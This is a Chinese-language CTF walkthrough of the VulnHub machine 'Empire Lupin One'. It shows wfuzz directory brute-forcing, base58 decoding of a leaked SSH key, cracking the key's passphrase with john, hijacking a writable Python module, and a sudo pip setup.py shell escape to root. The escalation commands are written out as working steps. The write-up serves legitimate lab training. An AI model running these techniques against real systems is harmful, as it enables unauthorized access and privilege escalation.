01 - Empire Lupin One
2024-06-06 00:50:57
目录
一、信息收集
二、漏洞发现
三、权限提升
总结
一、信息收集
常规的主机发现以及端口扫描,扫描自己所在的网段。
nmap 192.168.216.0/24nmap -A -v -T4 -p 1-65535 192.168.216.151
可以看到服务器开启了80端口,和22端口,22端口只能用来爆破,因此先查看一下80端口。
二、漏洞发现
访问80端口
没奇怪的地方,源代码也没有提示。
对网站进行目录扫描
robots.txt文件
不允许扫描到/~xx的目录,所以我们选择使用wfuzz来对目录进行爆破
wfuzz -c -z file,/usr/share/wordlists/wfuzz/general/big.txt --hc 404,403 http://192.168.216.151/\~FUZZ
扫到的/~secret目录,访问一下
这里应该icex64是一个用户,但是我们没有密码也登录不上服务器,但是上面提示了这下面还有隐藏的文件,所以我们接着使用fuzz来对其进行爆破
wfuzz -c -z file,/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --sc 200 http://192.168.216.151/~secret/.FUZZ.txt
.secret.txt文件
目测是一段加密后的字符串,用网上一些识别加密算法的网站对其进行识别发现是base58加密
用网上的base58解密算法对其解密,附上代码。
def base58_decode(cipher_input: str) -> str:"""base58编码典型应用是比特币钱包,与base64相比,去除了0、I、O、l、/ +等不易辨认的6个字符:param cipher_input: 输入base58编码值:return: base58的解码值@author hongfeiyinxue 2022-04-30-1651329023.0065577"""# 定义base58的58个编码base58 = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"cipher = cipher_input# 检查密文字符的有效性,密文字符必须是base58中的字符,否则返回提示bad = ''for item in cipher:if base58.find(item) == -1:bad += itemif bad != '':return '不是有效的Base58编码,请仔留意如下字符:' + bad# 获取密文每个字符在base58中的下标值tmp = []for item in cipher:tmp.append(base58.find(item))temp = tmp[0]for i in range(len(tmp) - 1):temp = temp * 58 + tmp[i + 1]temp = bin(temp).replace('0b', '')# print('temp=', temp, '-len-', len(temp))# 判断temp二进制编码数量能否被8整除,例如编码长度为18,首先截取(18%8)余数个字符求对应的ascii字符remainder = len(temp) % 8plain_text = ''if remainder != 0:temp_start = temp[0:remainder]plain_text = chr(int(temp[0:remainder], 2))for i in range(remainder, len(temp), 8):# print(chr(int((temp[i:i+8]), 2)))plain_text += chr(int((temp[i:i + 8]), 2))i += 8return plain_textdef base58_encode(string_input):"""base58编码典型应用是比特币钱包,与base64相比,去除了0、I、O、l、/ +等不易辨认的6个字符base58的编码思路是反复除以58取余数直至为0,base64的编码原理是64进制,2的6次方刚好等于64:param string_input: 输入待编码的字符:return: base58的编码值"""base58 = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"string = string_inputstring_binary = ''# 获取输入字符ascii码值的二进制码字符串,8个bit为一组for i in range(len(string)):string_binary = string_binary + str('{:0>8}'.format(bin(ord(string[i])).replace('0b', '')))string_decimal = int(string_binary, 2)string_58_list = []while True:string_58_list.insert(0, string_decimal % 58)string_decimal = string_decimal // 58if string_decimal == 0:breakstring_58 = ""for i in string_58_list:string_58 += base58[i]return string_58print(base58_decode('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'))解密后的字符串将其保存在我们的kali文件上,以便用来进行ssh连接
给他上权限,用之前发现的用户进行登录
chmod 600 rsa_id
ssh -i rsa_id icex64@192.168.216.151
登录时发现这个密钥还需要密码才能使用
用ssh2john工具将其转换为可识别的hash,然后使用john工具对其爆破
/usr/share/john/ssh2john.py rsa_id > hash
john --wordlist=/usr/share/wordlists/fasttrack.txt hash
爆出密码为:P@55w0rd!
然后ssh连接
连接成功,对这个用户进行信息收集
第一个flag
服务器版本
sudo信息
发现有其他用户的脚本执行权限,在arsene用户下查看heist.py文件
发现这个脚本调用了webbrowser模块,接着寻找这个模块
find /usr/ -name '*webb*'
在这个文件中发现引入了os模块,而且权限也是root,可进行读写操作
所以在文件中加入一段代码:os.system("bin/bash")
再将heist.py文件运行就能切换到arsene用户下的bash
三、权限提升
对arsene用户进行信息收集
发现可以利用pip进行sudo权限提升
在当前目录下执行以下操作,也可以在gtfobins.github.io/gtfobins/pip上查找pip权限提升
mkdir tmp
cd tmp
echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > setup.py
sudo pip install .
成功提权到root,获取到最后的一个flag,完结!!!
总结
wfuzz对隐藏目录进行爆破
base58加解密
ssh密钥密码使用ssh2john转换为可识别的hash,使用john爆破出密码
sudo权限提升
脚本权限以及利用
01 - Empire Lupin One相关推荐
- 靶机11 Empire Lupin One
总结 本次靶机涉及信息泄露漏洞,系统配置漏洞,sudo 提权 ffuf 工具暴力破解目录 在线识别算法:https://www.dcode.fr/cipher-identifier ssh2john工 ...
- VulnHub-01 - Empire Lupin One打靶记录
信息收集 目标发现 将目标虚拟机和攻击机放在互通的网络环境中,最好同一网段.也就是桥接在一个网卡上. 攻击机上: arp-scan -I eth0 -l 扫描本地eth0 寻找目标. 这里根据结果筛查 ...
- SEO优化之og:标签
文章目录[隐藏] SEO 优化 og 标签前言 SEO 优化 og 标签历史 SEO 优化 og 标签常用标签 SEO 优化 og 标签例子 1 SEO 优化 og 标签例子 2 SEO 优化 og ...
- vulnhub——Empire:LupinOne
一.概要 靶机:192.168.1.115 攻击机:192.168.1.113 下载地址:https://download.vulnhub.com/empire/02-Breakout.zip 二.主 ...
- 靶机渗透练习41-Empire Lupin One
靶机描述 靶机地址:https://www.vulnhub.com/entry/empire-lupinone,750/ Description Difficulty: Medium This box ...
- 网络渗透测试基础之帝国empire
一. Empire介绍 Empire是一款针对Windows平台的.使用Powershell脚本作为攻击载荷的渗透攻击框架工具,具有从stager生成.提权到渗透维持的一系列功能. Empire实现 ...
- 语言更新后程序包不见_后渗透测试神器Empire 3.0发布
点击蓝字关注我们 经历漫长的等待后,后渗透测试神器 Empire 终于迎来了多项重大功能升级的 3.0 版本(https://github.com/BC-SECURITY/Empire/). Empi ...
- 零起点学算法01——第一个程序Hello World!
零起点学算法01--第一个程序Hello World! Description 题目很简单 输出"Hello World!"(不含引号),并换行. Input 没有输入 Outpu ...
- hdu5296 01字典树
根据二进制建一棵01字典树,每个节点的答案等于左节点0的个数 * 右节点1的个数 * 2,遍历整棵树就能得到答案. AC代码: #include<cstdio> using namespa ...
最新文章
- bzoj1089: [SCOI2003]严格n元树
- 58同城创始人姚劲波:未来十年是中国创业最好机会
- SparkSQL之DataFrame案例
- 20年薪水的经典忠告
- mfc实验报告心得体会_mfc实验报告.doc
- 黑客攻击公司化:网络犯罪也有商业模式也有CEO
- java web 教程_Java Web服务教程
- C# winform 弹出输入框
- iphone开机白苹果_iphone白苹果原因是什么 iphone白苹果解决方法【介绍】
- UVA 1590 IP Networks
- 基于node.js和oicq的qq机器人 制作回顾分析笔记
- CentOS 7安装/卸载Redis,配置service服务管理
- switch vba_VBA switch
- php ean13,php生成EAN_13标准条形码实例_PHP教程
- NameError: name ‘d2l‘ is not defined
- 作为喜爱3D游戏动漫建模的你,如果还不知道次世代游戏贴图的这些技巧,真是太可惜了
- EtherCAT总线介绍及从站硬件设计
- 移动App多渠道推广统计
- 搜索与图论1—深搜、宽搜、拓扑排序
- 【杂谈】中国黑客致中国黑客和红客的公开信